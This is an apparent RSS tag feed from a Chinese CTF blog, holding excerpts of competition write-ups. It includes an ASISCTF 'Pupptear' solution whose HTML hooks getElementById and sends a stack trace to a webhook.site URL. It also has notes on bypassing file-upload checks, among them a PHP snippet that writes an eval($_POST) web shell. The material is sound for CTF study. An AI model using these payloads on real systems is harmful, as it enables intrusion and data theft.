2023 on chleynx's blog/tags/2023/Recent content in 2023 on chleynx's blogHugozh-cnWed, 07 Feb 2024 02:47:11 +0800N1CTF Junoir/posts/n1ctf-junoir/Wed, 07 Feb 2024 02:47:11 +0800/posts/n1ctf-junoir/<h1 id="n1ctf-junior">N1CTF Junior</h1> <h2 id="zako">zako</h2>强网杯2023/posts/qiangwangbei/Wed, 27 Dec 2023 00:26:21 +0800/posts/qiangwangbei/<h2 id="web">Web</h2> <p>给了docker,代码逻辑</p>楚慧杯/posts/chuhuibei/Mon, 25 Dec 2023 00:31:42 +0800/posts/chuhuibei/<h1 id="楚慧杯">楚慧杯</h1> <h2 id="eaaeval">eaaeval</h2> <p>打开题目,源码给了用户密码</p>ASISCTF/posts/asisctf/Mon, 25 Dec 2023 00:22:51 +0800/posts/asisctf/<h2 id="pupptear"><strong>Pupptear:</strong></h2> <p>***报错追踪文件名字</p> <pre tabindex="0"><code>Do you know what Puppeteer&#39;s friends call him when he cries? Pupptear... hahahaah [attachment](&lt;https://asisctf.com/tasks/pupptear_0ab53ea3b73da58a4d0854bf42ec1ea166283b3e.txz&gt;) nc 18.195.96.13 2000 Flag format for Pupptear: ^ASIS{[^{}]+}$ </code></pre><p><a href="https://prod-files-secure.s3.us-west-2.amazonaws.com/c378b070-6063-4137-81ee-f75f82009b81/7865afae-5d80-486d-b9d3-9239e8b4ff5e/pupptear.txz">pupptear.txz</a></p> <p>oh ok</p> <p>I get the concept.</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-jsx" data-lang="jsx"><span style="display:flex;"><span><span style="color:#a6e22e">url</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">input</span>(<span style="color:#e6db74">&#39;input URL (b64ed): &#39;</span>) </span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span>(<span style="color:#a6e22e">not</span> <span style="color:#a6e22e">re</span>.<span style="color:#a6e22e">match</span>(<span style="color:#e6db74">&#39;^[A-Za-z0-9=+/]+$&#39;</span>,<span style="color:#a6e22e">url</span>))<span style="color:#f92672">:</span> </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">print</span>(<span style="color:#e6db74">&#39;bad URL&#39;</span>) </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">exit</span>(<span style="color:#ae81ff">1</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#a6e22e">os</span>.<span style="color:#a6e22e">close</span>(<span style="color:#ae81ff">0</span>) </span></span><span style="display:flex;"><span><span style="color:#a6e22e">os</span>.<span style="color:#a6e22e">close</span>(<span style="color:#ae81ff">1</span>) </span></span><span style="display:flex;"><span><span style="color:#a6e22e">os</span>.<span style="color:#a6e22e">close</span>(<span style="color:#ae81ff">2</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#a6e22e">containerName</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;&#39;</span>.<span style="color:#a6e22e">join</span>(<span style="color:#a6e22e">random</span>.<span style="color:#a6e22e">choice</span>(<span style="color:#a6e22e">string</span>.<span style="color:#a6e22e">ascii_uppercase</span> <span style="color:#f92672">+</span> <span style="color:#a6e22e">string</span>.<span style="color:#a6e22e">digits</span>) <span style="color:#66d9ef">for</span> <span style="color:#a6e22e">_</span> <span style="color:#66d9ef">in</span> <span style="color:#a6e22e">range</span>(<span style="color:#ae81ff">0x10</span>)) </span></span><span style="display:flex;"><span><span style="color:#a6e22e">os</span>.<span style="color:#a6e22e">system</span>(<span style="color:#a6e22e">f</span><span style="color:#e6db74">&#39;bash -c &#34;sleep 5 &amp;&amp; docker kill {containerName} 2&gt;/dev/null&#34; &amp;&#39;</span>) </span></span><span style="display:flex;"><span><span style="color:#a6e22e">os</span>.<span style="color:#a6e22e">system</span>(<span style="color:#a6e22e">f</span><span style="color:#e6db74">&#39;docker run --name {containerName} pupptear bash -c \\&#39;</span><span style="color:#f92672">/</span><span style="color:#a6e22e">ASIS</span><span style="color:#f92672">*</span><span style="color:#960050;background-color:#1e0010">/index.js {url}\\&#39; &#39;)</span> </span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">#</span><span style="color:#f92672">!</span><span style="color:#960050;background-color:#1e0010">/usr/bin/env node</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">const</span> <span style="color:#a6e22e">puppeteer</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">require</span>(<span style="color:#e6db74">&#39;puppeteer&#39;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">const</span> <span style="color:#a6e22e">flag</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;flag{test-flag}&#39;</span>; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">function</span> <span style="color:#a6e22e">visit</span>(<span style="color:#a6e22e">url</span>){ </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">let</span> <span style="color:#a6e22e">browser</span>; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span>(<span style="color:#f92672">!</span><span style="color:#e6db74">/^https?:\\/</span><span style="color:#960050;background-color:#1e0010">\\</span><span style="color:#75715e">//.test(url)){ </span></span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span>; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">try</span>{ </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">browser</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">puppeteer</span>.<span style="color:#a6e22e">launch</span>({ </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">pipe</span><span style="color:#f92672">:</span> <span style="color:#66d9ef">true</span>, </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">args</span><span style="color:#f92672">:</span> [ </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;--no-sandbox&#34;</span>, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;--disable-setuid-sandbox&#34;</span>, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;--js-flags=--noexpose_wasm,--jitless&#34;</span>, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;--ignore-certificate-errors&#34;</span>, </span></span><span style="display:flex;"><span> ], </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">executablePath</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#34;/usr/bin/google-chrome-stable&#34;</span>, </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">headless</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#39;new&#39;</span> </span></span><span style="display:flex;"><span> }); </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">let</span> <span style="color:#a6e22e">page</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">browser</span>.<span style="color:#a6e22e">newPage</span>(); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">page</span>.<span style="color:#66d9ef">goto</span>(<span style="color:#a6e22e">url</span>,{ <span style="color:#a6e22e">timeout</span><span style="color:#f92672">:</span> <span style="color:#ae81ff">2000</span> }); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">page</span>.<span style="color:#a6e22e">waitForFunction</span>(<span style="color:#a6e22e">flag</span>=&gt;{ </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">let</span> <span style="color:#a6e22e">el</span> <span style="color:#f92672">=</span> document.<span style="color:#a6e22e">getElementById</span>(<span style="color:#e6db74">&#39;flag&#39;</span>) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span>(<span style="color:#f92672">!</span><span style="color:#a6e22e">el</span>) <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">false</span> </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">el</span>.<span style="color:#a6e22e">value</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">flag</span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">true</span> </span></span><span style="display:flex;"><span> },{ <span style="color:#a6e22e">timeout</span><span style="color:#f92672">:</span> <span style="color:#ae81ff">2000</span> },<span style="color:#a6e22e">flag</span>) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">await</span> <span style="color:#66d9ef">new</span> Promise(<span style="color:#a6e22e">r</span>=&gt;<span style="color:#a6e22e">setTimeout</span>(<span style="color:#a6e22e">r</span>,<span style="color:#ae81ff">3000</span>)); </span></span><span style="display:flex;"><span> }<span style="color:#66d9ef">catch</span>(<span style="color:#a6e22e">e</span>){} </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">try</span>{<span style="color:#66d9ef">await</span> <span style="color:#a6e22e">browser</span>.<span style="color:#a6e22e">close</span>();}<span style="color:#66d9ef">catch</span>(<span style="color:#a6e22e">e</span>){} </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">process</span>.<span style="color:#a6e22e">exit</span>(<span style="color:#ae81ff">0</span>) </span></span><span style="display:flex;"><span>} </span></span></code></pre></div><p>get folder name? have no idea.</p> <p>need to check if we can get flag during page move delay<img src="./image-20240101163004369-1707063823030-1.png" alt="image-20240101163004369"></p> <p>fake flag. need to get folder name. i guess stacktrace from waitforfunction?</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-docker" data-lang="docker"><span style="display:flex;"><span><span style="color:#66d9ef">WORKDIR</span> <span style="color:#e6db74">/app</span><span style="color:#960050;background-color:#1e0010"> </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">COPY</span> ./stuff/ /app/<span style="color:#960050;background-color:#1e0010"> </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">RUN</span> PUPPETEER_SKIP_DOWNLOAD<span style="color:#f92672">=</span><span style="color:#ae81ff">1</span> npm ci<span style="color:#960050;background-color:#1e0010"> </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">RUN</span> chmod +x /app/index.js<span style="color:#960050;background-color:#1e0010"> </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">RUN</span> useradd -m www<span style="color:#960050;background-color:#1e0010"> </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">RUN</span> chmod <span style="color:#ae81ff">777</span> /home/www/ -R<span style="color:#960050;background-color:#1e0010"> </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">ENV</span> FLAG<span style="color:#f92672">=</span>ASIS<span style="color:#f92672">{</span>test-flag<span style="color:#f92672">}</span><span style="color:#960050;background-color:#1e0010"> </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">RUN</span> mv /app/ /$FLAG/<span style="color:#960050;background-color:#1e0010"> </span></span></span><span style="display:flex;"><span>WORKDIR /<span style="color:#960050;background-color:#1e0010"> </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">USER</span> <span style="color:#e6db74">www</span><span style="color:#960050;background-color:#1e0010"> </span></span></span></code></pre></div><p>I guess yes.</p> <p>One way is to hook <code>Error</code> and find filename, but I have to install puppeteer for testing. I don’t know how things work internally for puppeteer😕</p> <p>If no one solves it I will try out sometime tomorrow.</p> <p>i dont know either. ppt is heavily coupled with chrome devtools, i guess the function execution is a part of devtools protocol.</p> <p>hook getElementById, read stacktrace.</p> <p>solved:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span><span style="color:#75715e">&lt;!DOCTYPE html&gt;</span> </span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">body</span>&gt; </span></span><span style="display:flex;"><span> &lt;<span style="color:#f92672">input</span> <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text&#34;</span> <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;flag&#34;</span> /&gt; </span></span><span style="display:flex;"><span> &lt;<span style="color:#f92672">script</span>&gt; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">oldFunc</span> <span style="color:#f92672">=</span> document.<span style="color:#a6e22e">getElementById</span> </span></span><span style="display:flex;"><span> document.<span style="color:#a6e22e">getElementById</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">function</span>(<span style="color:#a6e22e">id</span>) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">e</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">new</span> Error(); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">stack</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">e</span>.<span style="color:#a6e22e">stack</span>.<span style="color:#a6e22e">split</span>(<span style="color:#e6db74">&#39;\\n&#39;</span>); </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">fetch</span>(<span style="color:#e6db74">`</span><span style="color:#e6db74">${</span>document.<span style="color:#a6e22e">location</span>.<span style="color:#a6e22e">href</span><span style="color:#e6db74">}</span><span style="color:#e6db74">`</span>, { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">method</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#39;POST&#39;</span>, </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">headers</span><span style="color:#f92672">:</span> { </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#39;Content-Type&#39;</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#39;application/json&#39;</span> </span></span><span style="display:flex;"><span> }, </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">body</span><span style="color:#f92672">:</span> <span style="color:#a6e22e">JSON</span>.<span style="color:#a6e22e">stringify</span>({ </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">id</span>, </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">stack</span> </span></span><span style="display:flex;"><span> }) </span></span><span style="display:flex;"><span> }) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">oldFunc</span>.<span style="color:#a6e22e">apply</span>(document, <span style="color:#a6e22e">arguments</span>) </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> &lt;/<span style="color:#f92672">script</span>&gt; </span></span><span style="display:flex;"><span>&lt;/<span style="color:#f92672">body</span>&gt; </span></span></code></pre></div><p>or</p> <pre tabindex="0"><code>&lt;!DOCTYPE html&gt; &lt;body&gt; &lt;script&gt; const HOOK_URL = &#34;https://webhook.site/ae22bc03-bb75-4080-9702-36cbb57cc53d&#34;; let sent = false; function hook() { if (sent) return; sent = true; const e = new Error(); navigator.sendBeacon(HOOK_URL, e.stack); } document.getElementById = hook; &lt;/script&gt; &lt;/body&gt; </code></pre>文件上传/posts/file_upload/Tue, 10 Oct 2023 18:38:57 +0800/posts/file_upload/<h1 id="前端绕过">前端绕过</h1> <p>正常上传文件,捉取数据包修改(bp抓包改后缀)</p> <h1 id="后端绕过">后端绕过</h1> <p>服务器端检测的绕过</p> <h2 id="函数特性">函数特性</h2> <p>move_uploaded_file函数会自动去除文件名末尾的点 和 /.</p> <p><code>fopen</code>函数特性</p> <pre tabindex="0"><code>&lt;?php $filename=&#39;1.php/.&#39;; $content=&#34;&lt;?php eval($_POST[1]);?&gt;&#34;; $f = fopen($filename, &#39;w&#39;); fwrite($f, $content); fclose($f); ?&gt; #会在当前目录生成1.php,文件名为1.php.也可以 ———————————————— </code></pre><h5 id="其它">其它</h5> <p>后缀名大小写</p> <p>后缀名双写</p> <p><code>尝试php3 phtml php3457(linux+apache+php5.6)等后缀</code></p> <p>检测MIME类型的,捉包改MIME类型</p> <h3 id="服务端检测mine类型检测-">服务端检测(MINE类型检测) <a href="https://wiki.wgpsec.org/knowledge/ctf/uploadfile.html#%E6%9C%8D%E5%8A%A1%E7%AB%AF%E6%A3%80%E6%B5%8B-mine%E7%B1%BB%E5%9E%8B%E6%A3%80%E6%B5%8B">#</a></h3> <blockquote> <p>MIME (Multipurpose Internet Mail Extensions) 是描述消息内容类型的因特网标准。</p> </blockquote> <p>服务器代码判断$_FILES[”file“][&ldquo;type&rdquo;]是不是图片格式(<code>image/jpeg</code>、<code>image/png</code>、<code>image/gif</code>),如果不是,则不允许上传该文件。</p> <p>绕过方法:</p> <blockquote> <p>抓包后更改Content-Type为允许的类型绕过该代码限制,比如将php文件的<code>Content-Type:application/octet-stream</code>修改为<code>image/jpeg</code>、<code>image/png</code>、<code>image/gif</code>等就可以</p> </blockquote> <p>常见MIMETYPE</p> <blockquote> <p>audio/mpeg -&gt; .mp3 application/msword -&gt; .doc application/octet-stream -&gt; .exe application/pdf -&gt; .pdf application/x-javascript -&gt; .js application/x-rar -&gt; .rar application/zip -&gt; .zip image/gif -&gt; .gif image/jpeg -&gt; .jpg / .jpeg image/png -&gt; .png text/plain -&gt; .txt text/html -&gt; .html video/mp4 -&gt; .mp4</p>